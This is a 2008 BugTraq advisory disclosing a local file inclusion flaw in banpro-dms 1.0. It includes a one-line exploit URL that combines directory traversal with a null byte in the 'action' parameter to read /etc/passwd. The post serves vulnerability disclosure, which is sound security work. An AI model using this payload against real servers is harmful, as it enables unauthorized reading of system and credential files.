BugTraq
banpro-dms 1.0 local file inclusion vulnerability Feb 16 2008 02:05PM
muuratsalo experimental hack lab (muuratsalo gmail com)
banpro-dms 1.0 local file inclusion vulnerability

download http://sourceforge.net/projects/banprodms

author muuratsalo
contact muuratsalo[at]gmail.com

exploit
http://localhost/DMS/index.php?action=../../../../../../../../../../etc/
passwd%00

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus